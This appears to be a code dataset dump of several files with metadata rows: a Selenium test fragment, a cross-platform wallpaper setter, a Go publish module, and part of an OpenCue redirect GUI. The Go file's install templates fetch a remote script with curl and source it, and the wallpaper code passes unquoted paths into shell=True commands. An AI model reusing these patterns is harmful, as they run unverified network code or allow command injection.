driver = webdriver.Chrome(executable_path=os.environ['CHROMEDRIVER'], chrome_options=chrome_options)
try:
print driver.current_url
result = driver.find_element_by_id('require-resolve').get_attribute('innerHTML')
print result
assert('success' in result)
result = driver.find_element_by_id('require-cache').get_attribute('innerHTML')
print result
assert('success' in result)
result = driver.find_element_by_id('require-extensions').get_attribute('innerHTML')
print result
assert('success' in result)
finally:
driver.quit()
|
[] |
[] |
[
"CHROMEDRIVER"
] |
[]
|
["CHROMEDRIVER"]
|
python
| 1 | 0 | |
dynpaper/desktop.py
|
#!/usr/bin/env python3
# coding: utf-8
# Copyright © 2016 Bharadwaj Raju <[email protected]>
# All Rights Reserved.
# Original code taken from the following answers by StackOverflow user
# Martin Hansen (http://stackoverflow.com/users/2118300/martin-hansen):
# - http://stackoverflow.com/a/21213358/5413945
# - http://stackoverflow.com/a/21213504/5413945
# This file is part of WeatherDesk.
#
# WeatherDesk is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# WeatherDesk is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with WeatherDesk (in the LICENSE file).
# If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import subprocess
import configparser
from textwrap import dedent
# Library to set wallpaper and find desktop - Cross-platform
def get_desktop_environment():
if sys.platform in ['win32', 'cygwin']:
return 'windows'
elif sys.platform == 'darwin':
return 'mac'
else:
desktop_session = os.environ.get(
'XDG_CURRENT_DESKTOP') or os.environ.get('DESKTOP_SESSION')
if desktop_session is not None:
desktop_session = desktop_session.lower()
# Fix for X-Cinnamon etc
if desktop_session.startswith('x-'):
desktop_session = desktop_session.replace('x-', '')
if desktop_session in ['gnome', 'unity', 'cinnamon', 'mate',
'xfce4', 'lxde', 'fluxbox',
'blackbox', 'openbox', 'icewm', 'jwm',
'afterstep', 'trinity', 'kde', 'pantheon',
'i3', 'lxqt', 'awesome']:
return desktop_session
# -- Special cases --#
# Canonical sets $DESKTOP_SESSION to Lubuntu rather than LXDE if using LXDE.
# There is no guarantee that they will not do the same with the other desktop environments.
# In Ubuntu 17.04, $DESKTOP_SESSION is set to 'Unity:Unity7' instead of 'Unity' when using Unity
elif 'xfce' in desktop_session or desktop_session.startswith('xubuntu'):
return 'xfce4'
elif desktop_session.startswith('ubuntu') or desktop_session.startswith('unity'):
return 'unity'
elif desktop_session.startswith('lubuntu'):
return 'lxde'
elif desktop_session.startswith('kubuntu'):
return 'kde'
elif desktop_session.startswith('razor'):
return 'razor-qt'
elif desktop_session.startswith('wmaker'):
return 'windowmaker'
if os.environ.get('KDE_FULL_SESSION') == 'true':
return 'kde'
elif os.environ.get('GNOME_DESKTOP_SESSION_ID'):
if 'deprecated' not in os.environ.get('GNOME_DESKTOP_SESSION_ID'):
return 'gnome2'
elif is_running('xfce-mcs-manage'):
return 'xfce4'
elif is_running('ksmserver'):
return 'kde'
return 'unknown'
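# e.g. a GNOME session (XDG_CURRENT_DESKTOP=GNOME) returns 'gnome'; anything unrecognized falls back to 'unknown'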
def is_running(process):
try: # Linux/Unix
s = subprocess.Popen(['ps', 'axw'], stdout=subprocess.PIPE)
except: # Windows
s = subprocess.Popen(['tasklist', '/v'], stdout=subprocess.PIPE)
process_list, err = s.communicate()
return process in str(process_list)
def set_wallpaper(image, desktop_env=get_desktop_environment()):
image = os.path.expanduser(image)
if desktop_env in ['gnome', 'unity', 'cinnamon', 'pantheon']:
uri = f'file://{image}'
try:
from gi.repository import Gio
SCHEMA = 'org.gnome.desktop.background'
KEY = 'picture-uri'
gsettings = Gio.Settings.new(SCHEMA)
gsettings.set_string(KEY, uri)
except:
args = ['gsettings', 'set',
'org.gnome.desktop.background', 'picture-uri', uri]
subprocess.Popen(args)
elif desktop_env == 'mate':
try: # MATE >= 1.6
args = ['gsettings', 'set', 'org.mate.background',
'picture-filename', '%s' % image]
subprocess.Popen(args)
except: # MATE < 1.6
args = ['mateconftool-2', '-t', 'string', '--set', '/desktop/mate/background/picture_filename',
'%s' % image]
subprocess.Popen(args)
elif desktop_env == 'gnome2':
args = ['gconftool-2', '-t', 'string', '--set',
'/desktop/gnome/background/picture_filename', '%s' % image]
subprocess.Popen(args)
elif desktop_env == 'kde':
kde_script = dedent(
'''\
var Desktops = desktops();
for (i=0;i<Desktops.length;i++) {
d = Desktops[i];
d.wallpaperPlugin = "org.kde.image";
d.currentConfigGroup = Array("Wallpaper",
"org.kde.image",
"General");
d.writeConfig("Image", "file://%s")
}
''') % image
subprocess.Popen(
['dbus-send',
'--session',
'--dest=org.kde.plasmashell',
'--type=method_call',
'/PlasmaShell',
'org.kde.PlasmaShell.evaluateScript',
'string:{}'.format(kde_script)]
)
elif desktop_env in ['kde3', 'trinity']:
args = 'dcop kdesktop KBackgroundIface setWallpaper 0 "%s" 6' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'xfce4':
# XFCE4's image property is not image-path but last-image (What?)
# Only GNOME seems to have a sane wallpaper interface
# Update: the monitor id thing seems to be changed in
# XFCE 4.12 to just monitor0 instead of monitorVGA1 or something
# So now we need to do both.
list_of_properties_cmd = subprocess.Popen(['bash -c "xfconf-query -R -l -c xfce4-desktop -p /backdrop"'],
shell=True, stdout=subprocess.PIPE)
list_of_properties, list_of_properties_err = list_of_properties_cmd.communicate()
list_of_properties = list_of_properties.decode('utf-8')
for i in list_of_properties.split('\n'):
if i.endswith('last-image'):
# The property given is a background property
subprocess.Popen(
['xfconf-query -c xfce4-desktop -p %s -s "%s"' %
(i, image)],
shell=True)
subprocess.Popen(['xfdesktop --reload'], shell=True)
elif desktop_env == 'razor-qt':
desktop_conf = configparser.ConfigParser()
# Development version
desktop_conf_file = os.path.join(
get_config_dir('razor'), 'desktop.conf')
if os.path.isfile(desktop_conf_file):
config_option = r'screens\1\desktops\1\wallpaper'
else:
desktop_conf_file = os.path.join(
os.path.expanduser('~'), '.razor/desktop.conf')
config_option = r'desktops\1\wallpaper'
desktop_conf.read(os.path.join(desktop_conf_file))
try:
import codecs
# only replacing a value
if desktop_conf.has_option('razor', config_option):
desktop_conf.set('razor', config_option, image)
with codecs.open(desktop_conf_file, 'w', encoding='utf-8', errors='replace') as f:
desktop_conf.write(f)
except:
pass
elif desktop_env in ['fluxbox', 'jwm', 'openbox', 'afterstep', 'i3']:
try:
args = ['feh', '--bg-scale', image]
subprocess.Popen(args)
except:
sys.stderr.write('Error: Failed to set wallpaper with feh!\n')
sys.stderr.write('Please make sure that you have feh installed.\n')
elif desktop_env == 'icewm':
args = ['icewmbg', image]
subprocess.Popen(args)
elif desktop_env == 'blackbox':
args = ['bsetbg', '-full', image]
subprocess.Popen(args)
elif desktop_env == 'lxde':
args = 'pcmanfm --set-wallpaper %s --wallpaper-mode=scaled' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'lxqt':
args = 'pcmanfm-qt --set-wallpaper %s --wallpaper-mode=scaled' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'windowmaker':
args = 'wmsetbg -s -u %s' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'enlightenment':
args = 'enlightenment_remote -desktop-bg-add 0 0 0 0 %s' % image
subprocess.Popen(args, shell=True)
elif desktop_env == 'awesome':
with subprocess.Popen("awesome-client", stdin=subprocess.PIPE) as awesome_client:
command = 'local gears = require("gears"); for s = 1, screen.count() do gears.wallpaper.maximized("%s", s, true); end;' % image
awesome_client.communicate(input=bytes(command, 'UTF-8'))
elif desktop_env == 'windows':
# Update Windows Registry and Force Desktop Reload
os.system(
'''reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d %s /f''' % image)
os.system(
'''RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters 1, True''')
elif desktop_env == 'mac':
try:
from appscript import app, mactypes
app('Finder').desktop_picture.set(mactypes.File(image))
except ImportError:
OSX_SCRIPT = '''tell application "System Events"
set desktopCount to count of desktops
repeat with desktopNumber from 1 to desktopCount
tell desktop desktopNumber
set picture to POSIX file "%s"
end tell
end repeat
end tell
''' % image
osx_script_file = open(os.path.expanduser(
'~/.weatherdesk_script.AppleScript'), 'w')
osx_script_file.truncate()
osx_script_file.write(OSX_SCRIPT)
osx_script_file.close()
subprocess.Popen(
['/usr/bin/osascript', os.path.abspath(os.path.expanduser('~/.weatherdesk_script.AppleScript'))])
else:
sys.stderr.write(
'Error: Failed to set wallpaper. (Desktop not supported)')
return False
return True
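# Example (hypothetical path): set_wallpaper('~/Pictures/night.jpg') dispatches to the
# detected desktop's backend and returns True, or False if the desktop is unsupported.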
def get_config_dir(app_name):
if 'XDG_CONFIG_HOME' in os.environ:
confighome = os.environ['XDG_CONFIG_HOME']
elif 'APPDATA' in os.environ: # On Windows
confighome = os.environ['APPDATA']
else:
try:
from xdg import BaseDirectory
confighome = BaseDirectory.xdg_config_home
except ImportError: # Most likely a Linux/Unix system anyway
confighome = os.path.join(os.path.expanduser('~'), '.config')
configdir = os.path.join(confighome, app_name)
return configdir
|
[] |
[] |
[
"DESKTOP_SESSION",
"GNOME_DESKTOP_SESSION_ID",
"APPDATA",
"KDE_FULL_SESSION",
"XDG_CURRENT_DESKTOP",
"XDG_CONFIG_HOME"
] |
[]
|
["DESKTOP_SESSION", "GNOME_DESKTOP_SESSION_ID", "APPDATA", "KDE_FULL_SESSION", "XDG_CURRENT_DESKTOP", "XDG_CONFIG_HOME"]
|
python
| 6 | 0 | |
core/code/publish.go
|
package code
import (
"fmt"
"os"
"path"
"runtime"
"strings"
ice "github.com/shylinux/icebergs"
"github.com/shylinux/icebergs/base/aaa"
"github.com/shylinux/icebergs/base/cli"
"github.com/shylinux/icebergs/base/mdb"
"github.com/shylinux/icebergs/base/nfs"
"github.com/shylinux/icebergs/base/tcp"
"github.com/shylinux/icebergs/base/web"
kit "github.com/shylinux/toolkits"
)
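// _publish_file links file into the publish directory and returns the target path.
// Directories are tar-gzipped first, and the ice.bin binary is renamed per GOOS/GOARCH;
// it returns "" if that binary has already been published.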
func _publish_file(m *ice.Message, file string, arg ...string) string {
if strings.HasSuffix(file, "ice.bin") {
// Package the application binary
arg = append(arg, kit.Keys("ice", runtime.GOOS, runtime.GOARCH))
if _, e := os.Stat(path.Join(m.Conf(PUBLISH, kit.META_PATH), kit.Select(path.Base(file), arg, 0))); e == nil {
return ""
}
} else if s, e := os.Stat(file); m.Assert(e) && s.IsDir() {
// Package the directory into a tarball
p := path.Base(file) + ".tar.gz"
m.Cmd(cli.SYSTEM, "tar", "-zcf", p, file)
defer func() { os.Remove(p) }()
file = p
}
// Publish the file
target := path.Join(m.Conf(PUBLISH, kit.META_PATH), kit.Select(path.Base(file), arg, 0))
m.Log_EXPORT(PUBLISH, target, kit.MDB_FROM, file)
m.Cmd(nfs.LINK, target, file)
return target
}
const PUBLISH = "publish"
func init() {
Index.Merge(&ice.Context{
Commands: map[string]*ice.Command{
ice.CTX_INIT: {Hand: func(m *ice.Message, c *ice.Context, cmd string, arg ...string) {
m.Cmd(aaa.ROLE, aaa.WHITE, aaa.VOID, m.Prefix(PUBLISH))
m.Cmd(aaa.ROLE, aaa.WHITE, aaa.VOID, ice.USR_PUBLISH)
m.Conf(PUBLISH, kit.Keym(ice.CONTEXTS), _contexts)
}},
PUBLISH: {Name: "publish path auto create volcanos icebergs intshell package dream", Help: "发布", Action: map[string]*ice.Action{
mdb.CREATE: {Name: "create file", Help: "添加", Hand: func(m *ice.Message, arg ...string) {
_publish_file(m, m.Option(kit.MDB_FILE))
}},
ice.VOLCANOS: {Name: "volcanos", Help: "火山架", Hand: func(m *ice.Message, arg ...string) {
defer func() { m.EchoQRCode(m.Option(ice.MSG_USERWEB)) }()
defer func() { m.Cmdy(PUBLISH, ice.CONTEXTS, "miss") }()
m.Cmd(PUBLISH, mdb.CREATE, kit.MDB_FILE, ice.ETC_MISS)
m.Cmd(PUBLISH, mdb.CREATE, kit.MDB_FILE, ice.GO_MOD)
m.Cmd(nfs.DEFS, path.Join(m.Conf(PUBLISH, kit.META_PATH), ice.ORDER_JS), m.Conf(PUBLISH, kit.Keym(JS)))
m.Cmd(nfs.DEFS, path.Join(ice.USR_VOLCANOS, "page/cache.css"), "")
m.Cmd(nfs.DEFS, path.Join(ice.USR_VOLCANOS, "page/cache.js"), "")
m.Option(nfs.DIR_DEEP, ice.TRUE)
m.Option(nfs.DIR_REG, `.*\.(html|css|js)$`)
m.Option(nfs.DIR_ROOT, m.Conf(PUBLISH, kit.META_PATH))
m.Cmdy(nfs.DIR, "./", "time,size,line,path,link")
}},
ice.ICEBERGS: {Name: "icebergs", Help: "冰山架", Hand: func(m *ice.Message, arg ...string) {
defer func() { m.Cmdy(PUBLISH, ice.CONTEXTS, "base") }()
m.Cmd(PUBLISH, mdb.CREATE, kit.MDB_FILE, ice.BIN_ICE_SH)
m.Cmd(PUBLISH, mdb.CREATE, kit.MDB_FILE, ice.BIN_ICE_BIN)
p := m.Option(cli.CMD_DIR, m.Conf(PUBLISH, kit.META_PATH))
ls := strings.Split(strings.TrimSpace(m.Cmd(cli.SYSTEM, "bash", "-c", "ls |xargs file |grep executable").Append(cli.CMD_OUT)), ice.MOD_NL)
for _, ls := range ls {
if file := strings.TrimSpace(strings.Split(ls, ":")[0]); file != "" {
if s, e := os.Stat(path.Join(p, file)); e == nil {
m.Push(kit.MDB_TIME, s.ModTime())
m.Push(kit.MDB_SIZE, kit.FmtSize(s.Size()))
m.Push(kit.MDB_FILE, file)
m.PushDownload(kit.MDB_LINK, file, path.Join(p, file))
}
}
}
m.SortTimeR(kit.MDB_TIME)
}},
ice.INTSHELL: {Name: "intshell", Help: "神农架", Hand: func(m *ice.Message, arg ...string) {
defer func() { m.Cmdy(PUBLISH, ice.CONTEXTS, "tmux") }()
m.Cmd(nfs.DEFS, path.Join(m.Conf(PUBLISH, kit.META_PATH), ice.ORDER_SH), m.Conf(PUBLISH, kit.Keym(SH)))
m.Option(nfs.DIR_DEEP, ice.TRUE)
m.Option(nfs.DIR_REG, ".*\\.(sh|vim|conf)$")
m.Option(nfs.DIR_ROOT, m.Conf(PUBLISH, kit.META_PATH))
m.Cmdy(nfs.DIR, "./", "time,size,line,path,link")
}},
ice.CONTEXTS: {Name: "contexts", Help: "环境", Hand: func(m *ice.Message, arg ...string) {
u := kit.ParseURL(tcp.ReplaceLocalhost(m, m.Option(ice.MSG_USERWEB)))
host := u.Host
m.Option("httphost", fmt.Sprintf("%s://%s:%s", u.Scheme, strings.Split(host, ":")[0], kit.Select(kit.Select("80", "443", u.Scheme == "https"), strings.Split(host, ":"), 1)))
m.Option("hostport", fmt.Sprintf("%s:%s", strings.Split(host, ":")[0], kit.Select(kit.Select("80", "443", u.Scheme == "https"), strings.Split(host, ":"), 1)))
m.Option("hostname", strings.Split(host, ":")[0])
m.Option("userhost", fmt.Sprintf("%s@%s", m.Option(ice.MSG_USERNAME), strings.Split(host, ":")[0]))
m.Option("hostpath", kit.Path("./.ish/pluged"))
if len(arg) == 0 {
arg = append(arg, "tmux", "base", "miss", "binary", "source", "project")
}
for _, k := range arg {
if buf, err := kit.Render(m.Conf(PUBLISH, kit.Keym(ice.CONTEXTS, k)), m); m.Assert(err) {
m.EchoScript(strings.TrimSpace(string(buf)))
}
}
}},
"package": {Name: "package", Help: "依赖", Hand: func(m *ice.Message, arg ...string) {
web.PushStream(m)
p := kit.Path(ice.USR_PUBLISH)
m.Option(cli.CMD_DIR, kit.Path(os.Getenv("HOME")))
// m.Cmdy(cli.SYSTEM, "tar", "-zcvf", "go.tar.gz", "go/pkg")
// m.Cmdy(cli.SYSTEM, "mv", "go.tar.gz", p)
m.Cmdy(cli.SYSTEM, "tar", "-zcvf", "vim.tar.gz", ".vim/plugged")
m.Cmdy(cli.SYSTEM, "mv", "vim.tar.gz", p)
m.Toast("打包成功")
m.ProcessHold()
}},
mdb.REMOVE: {Name: "remove", Help: "删除", Hand: func(m *ice.Message, arg ...string) {
p := m.Option(cli.CMD_DIR, m.Conf(PUBLISH, kit.META_PATH))
os.Remove(path.Join(p, m.Option(kit.MDB_PATH)))
}},
mdb.INPUTS: {Name: "inputs", Help: "补全", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(web.DREAM, mdb.INPUTS, arg)
}},
web.DREAM: {Name: "dream name=hi repos", Help: "启动", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(web.DREAM, tcp.START, arg)
m.Process(ice.PROCESS_OPEN, kit.MergeURL(m.Option(ice.MSG_USERWEB),
cli.POD, kit.Keys(m.Option(ice.MSG_USERPOD), m.Option(kit.MDB_NAME))))
}},
}, Hand: func(m *ice.Message, c *ice.Context, cmd string, arg ...string) {
m.Option(nfs.DIR_ROOT, m.Conf(PUBLISH, kit.META_PATH))
m.Cmdy(nfs.DIR, kit.Select("", arg, 0), "time,size,path,action,link")
}},
},
Configs: map[string]*ice.Config{
PUBLISH: {Name: PUBLISH, Help: "发布", Value: kit.Data(
kit.MDB_PATH, "usr/publish", ice.CONTEXTS, _contexts,
SH, `#!/bin/bash
echo "hello world"
`,
JS, `Volcanos("onengine", {_init: function(can, sub) {
can.base.Log("hello volcanos world")
}, river: {
}})
`,
)},
},
})
}
var _contexts = kit.Dict(
"project", `# 创建项目
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp project
`,
"source", `# 源码安装
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp source
`,
"binary", `# 应用安装
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp binary
`,
"miss", `# 开发环境
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp dev
`,
"base", `# 生产环境
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp app
`,
"tmux", `# 终端环境
export ctx_dev={{.Option "httphost"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp
`,
"tool", `# 群组环境
mkdir contexts; cd contexts
export ctx_log=/dev/stdout ctx_dev={{.Option "httphost"}} ctx_river={{.Option "sess.river"}} ctx_share={{.Option "share"}} ctx_temp=$(mktemp); curl -fsSL $ctx_dev -o $ctx_temp; source $ctx_temp ice
`,
)
|
[
"\"HOME\""
] |
[] |
[
"HOME"
] |
[]
|
["HOME"]
|
go
| 1 | 0 | |
cuegui/cuegui/Redirect.py
|
# Copyright Contributors to the OpenCue Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An interface for redirecting resources from one job to another job.
The concept here is that there is a target job that needs procs. The user would choose the job.
The highest core/memory value would be detected and would populate 2 text boxes for cores and
memory. The user could then adjust these and hit search. The search will find all hosts that have
frames running that can be redirected to the target job."""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from builtins import str
from builtins import range
import os
import re
import time
from PySide2 import QtCore
from PySide2 import QtGui
from PySide2 import QtWidgets
import opencue
import cuegui.Utils
class ShowCombo(QtWidgets.QComboBox):
"""
A combo box for show selection
"""
def __init__(self, selected="pipe", parent=None):
QtWidgets.QComboBox.__init__(self, parent)
self.refresh()
self.setCurrentIndex(self.findText(selected))
def refresh(self):
"""Refreshes the show list."""
self.clear()
shows = opencue.api.getActiveShows()
shows.sort(key=lambda x: x.data.name)
for show in shows:
self.addItem(show.data.name, show)
def getShow(self):
"""Gets the selected show."""
return str(self.setCurrentText())
class AllocFilter(QtWidgets.QPushButton):
"""
A drop down box for selecting allocations you want
to include in the redirect.
"""
default = ["lax.spinux"]
def __init__(self, parent=None):
QtWidgets.QPushButton.__init__(self, "Allocations", parent)
self.__menu = QtWidgets.QMenu(self)
self.__selected = None
self.refresh()
self.setMenu(self.__menu)
# This is used to provide the number of allocations selected
# on the button title.
self.__menu.triggered.connect(self.__afterClicked) # pylint: disable=no-member
def refresh(self):
"""Refreshes the full list of allocations."""
allocs = opencue.api.getAllocations()
allocs.sort(key=lambda x: x.data.name)
self.__menu.clear()
checked = 0
for alloc in allocs:
a = QtWidgets.QAction(self.__menu)
a.setText(alloc.data.name)
a.setCheckable(True)
if alloc.data.name in AllocFilter.default:
a.setChecked(True)
checked += 1
self.__menu.addAction(a)
self.__setSelected()
self.setText("Allocations (%d)" % checked)
def getSelected(self):
"""
Return an immutable set of selected allocations.
"""
return self.__selected
def isFiltered(self, host):
"""
Return true if the host should be filtered.
"""
return host.data.allocName not in self.__selected
def __setSelected(self):
"""
Build the selected set of allocations.
"""
selected = []
for item in self.__menu.actions():
if item.isChecked():
selected.append(str(item.text()))
self.__selected = selected
def __afterClicked(self, action):
"""
Execute after an allocation has been selected for filtering.
"""
del action
self.__setSelected()
self.setText("Allocations (%d)" % len(self.__selected))
class JobBox(QtWidgets.QLineEdit):
"""
A text box that auto-completes job names.
"""
def __init__(self, parent=None):
QtWidgets.QLineEdit.__init__(self, parent)
self.__c = None
self.refresh()
def refresh(self):
"""Refreshes the list of job names."""
slist = opencue.api.getJobNames()
slist.sort()
self.__c = QtWidgets.QCompleter(slist, self)
self.__c.setCaseSensitivity(QtCore.Qt.CaseInsensitive)
self.setCompleter(self.__c)
class GroupFilter(QtWidgets.QPushButton):
"""
A Button widget that displays a drop down menu of
selectable groups.
"""
def __init__(self, show, name, parent=None):
QtWidgets.QPushButton.__init__(self, name, parent)
self.__show = self.__loadShow(show)
self.__menu = QtWidgets.QMenu(self)
self.__actions = { }
self.setMenu(self.__menu)
self.__menu.aboutToShow.connect(self.__populate_menu) # pylint: disable=no-member
# pylint: disable=inconsistent-return-statements
def __loadShow(self, show):
self.__actions = {}
# pylint: disable=bare-except
try:
if show:
return show
except:
return opencue.api.findShow(show.name())
def showChanged(self, show):
"""Loads a new show."""
self.__show = self.__loadShow(show)
def __populate_menu(self):
self.__menu.clear()
for group in self.__show.getGroups():
if opencue.id(group) in self.__actions:
self.__menu.addAction(self.__actions[opencue.id(group)])
else:
action = QtWidgets.QAction(self)
action.setText(group.data.name)
action.setCheckable(True)
self.__actions[opencue.id(group)] = action
self.__menu.addAction(action)
def getChecked(self):
"""Gets a list of action text for all selected actions."""
return [str(action.text()) for action in
list(self.__actions.values()) if action.isChecked()]
class RedirectControls(QtWidgets.QWidget):
"""
A widget that contains all the controls to search for possible
procs that can be redirected.
"""
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.__current_show = opencue.api.findShow(os.getenv("SHOW", "pipe"))
self.__show_combo = ShowCombo(self.__current_show.data.name, self)
self.__job_box = JobBox(self)
self.__alloc_filter = AllocFilter(self)
self.__cores_spin = QtWidgets.QSpinBox(self)
self.__cores_spin.setRange(1, self._cfg().get('max_cores', 32))
self.__cores_spin.setValue(1)
self.__mem_spin = QtWidgets.QDoubleSpinBox(self)
self.__mem_spin.setRange(1, self._cfg().get('max_memory', 200))
self.__mem_spin.setDecimals(1)
self.__mem_spin.setValue(4)
self.__mem_spin.setSuffix("GB")
self.__limit_spin = QtWidgets.QSpinBox(self)
self.__limit_spin.setRange(1, 100)
self.__limit_spin.setValue(10)
self.__prh_spin = QtWidgets.QDoubleSpinBox(self)
self.__prh_spin.setRange(1, self._cfg().get('max_proc_hour_cutoff', 30))
self.__prh_spin.setDecimals(1)
self.__prh_spin.setValue(10)
self.__prh_spin.setSuffix("PrcHrs")
# Job Filters
self.__include_group_btn = GroupFilter(self.__current_show, "Include Groups", self)
self.__require_services = QtWidgets.QLineEdit(self)
self.__exclude_regex = QtWidgets.QLineEdit(self)
self.__update_btn = QtWidgets.QPushButton("Search", self)
self.__redirect_btn = QtWidgets.QPushButton("Redirect", self)
self.__select_all_btn = QtWidgets.QPushButton("Select All", self)
self.__clear_btn = QtWidgets.QPushButton("Clr", self)
self.__group = QtWidgets.QGroupBox("Resource Filters")
self.__group_filter = QtWidgets.QGroupBox("Job Filters")
layout1 = QtWidgets.QHBoxLayout()
layout1.addWidget(self.__update_btn)
layout1.addWidget(self.__redirect_btn)
layout1.addWidget(self.__select_all_btn)
layout1.addWidget(QtWidgets.QLabel("Target:", self))
layout1.addWidget(self.__job_box)
layout1.addWidget(self.__clear_btn)
layout2 = QtWidgets.QHBoxLayout()
layout2.addWidget(self.__alloc_filter)
layout2.addWidget(QtWidgets.QLabel("Minimum Cores:", self))
layout2.addWidget(self.__cores_spin)
layout2.addWidget(QtWidgets.QLabel("Minimum Memory:", self))
layout2.addWidget(self.__mem_spin)
layout2.addWidget(QtWidgets.QLabel("Result Limit:", self))
layout2.addWidget(self.__limit_spin)
layout2.addWidget(QtWidgets.QLabel("Proc Hour Cutoff:", self))
layout2.addWidget(self.__prh_spin)
layout3 = QtWidgets.QHBoxLayout()
layout3.addWidget(QtWidgets.QLabel("Show:", self))
layout3.addWidget(self.__show_combo)
layout3.addWidget(self.__include_group_btn)
layout3.addWidget(QtWidgets.QLabel("Require Services", self))
layout3.addWidget(self.__require_services)
layout3.addWidget(QtWidgets.QLabel("Exclude Regex", self))
layout3.addWidget(self.__exclude_regex)
self.__group.setLayout(layout2)
self.__group_filter.setLayout(layout3)
layout = QtWidgets.QVBoxLayout(self)
layout.addWidget(self.__group_filter)
layout.addWidget(self.__group)
layout.addLayout(layout1)
# pylint: disable=no-member
self.__job_box.textChanged.connect(self.detect)
self.__show_combo.currentIndexChanged.connect(self.showChanged)
# pylint: enable=no-member
def _cfg(self):
'''
Loads (if necessary) and returns the config values.
Warns and returns an empty dict if there's a problem reading the config
@return: The keys & values stored in the config file
@rtype: dict<str:str>
'''
if not hasattr(self, '__config'):
self.__config = cuegui.Utils.getResourceConfig()
return self.__config
def showChanged(self, show_index):
"""Load a new show."""
del show_index
show = self.__show_combo.currentText()
self.__current_show = opencue.api.findShow(str(show))
self.__include_group_btn.showChanged(self.__current_show)
def detect(self, name=None):
"""Populates initial values when the job name is changed."""
del name
try:
job = opencue.api.findJob(str(self.__job_box.text()))
except opencue.exception.CueException:
return
layers = job.getLayers()
minCores = 1.0
minMem = 0
for layer in layers:
if layer.data.min_cores > minCores:
minCores = layer.data.min_cores
if layer.data.min_memory > minMem:
minMem = layer.data.min_memory
self.__cores_spin.setValue(int(minCores))
self.__mem_spin.setValue(float(minMem / 1048576.0))
self.__show_combo.setCurrentIndex(self.__show_combo.findText(job.data.show))
def getJob(self):
"""Gets the current job name."""
return str(self.__job_box.text())
def getCores(self):
"""Gets the core count."""
return int(self.__cores_spin.value())
def getMemory(self):
"""Gets the memory amount."""
return int(self.__mem_spin.value() * 1048576.0)
def getJobBox(self):
"""Gets the job box widget."""
return self.__job_box
def getUpdateButton(self):
"""Gets the update button widget."""
return self.__update_btn
def getRedirectButton(self):
"""Gets the redirect button widget."""
return self.__redirect_btn
def getSelectAllButton(self):
"""Gets the select all button widget."""
return self.__select_all_btn
def getClearButton(self):
"""Gets the clear button widget."""
return self.__clear_btn
def getShow(self):
"""Gets the current show."""
return self.__current_show
def getAllocFilter(self):
"""Gets the allocation filter."""
return self.__alloc_filter
def getLimit(self):
"""Gets the limit."""
return self.__limit_spin.value()
def getCutoffTime(self):
"""Gets the cutoff time."""
return int(self.__prh_spin.value() * 3600.0)
def getRequiredService(self):
"""Gets the required service name."""
return str(self.__require_services.text()).strip()
def getJobNameExcludeRegex(self):
"""Gets the regex of job name to exclude."""
return str(self.__exclude_regex.text()).strip()
def getIncludedGroups(self):
"""Gets the value of the include groups checkbox."""
return self.__include_group_btn.getChecked()
class RedirectWidget(QtWidgets.QWidget):
"""
Displays a table of procs that can be selected for redirect.
"""
HEADERS = ["Name", "Cores", "Memory", "PrcTime", "Group", "Service"]
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
self.__hosts = {}
self.__controls = RedirectControls(self)
self.__model = QtGui.QStandardItemModel(self)
self.__model.setColumnCount(5)
self.__model.setHorizontalHeaderLabels(RedirectWidget.HEADERS)
self.__tree = QtWidgets.QTreeView(self)
self.__tree.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.__tree.setModel(self.__model)
layout = QtWidgets.QVBoxLayout(self)
layout.addWidget(self.__controls)
layout.addWidget(self.__tree)
# pylint: disable=no-member
self.__controls.getUpdateButton().pressed.connect(self.update)
self.__controls.getRedirectButton().pressed.connect(self.redirect)
self.__controls.getSelectAllButton().pressed.connect(self.selectAll)
self.__controls.getClearButton().pressed.connect(self.clearTarget)
# pylint: enable=no-member
def __get_selected_procs_by_alloc(self, selected_items):
"""
Gathers and returns the selected procs, grouped by allocation their
allocation names
@param selected_items: The selected rows to analyze
@type selected_items: list<dict<str:varies>>
@return: A dictionary with the allocation names are the keys and the
selected procs are the values.
@rtype: dict<str:L{opencue.wrappers.proc.Proc}>
"""
procs_by_alloc = {}
for item in selected_items:
entry = self.__hosts.get(str(item.text()))
alloc = entry.get('alloc')
alloc_procs = procs_by_alloc.get(alloc, [])
alloc_procs.extend(list(entry["procs"]))
procs_by_alloc[alloc] = alloc_procs
return procs_by_alloc
def __warn(self, msg):
"""
Displays the given message for the user to acknowledge
@param msg: The message to display
@type msg: str
"""
message = QtWidgets.QMessageBox(self)
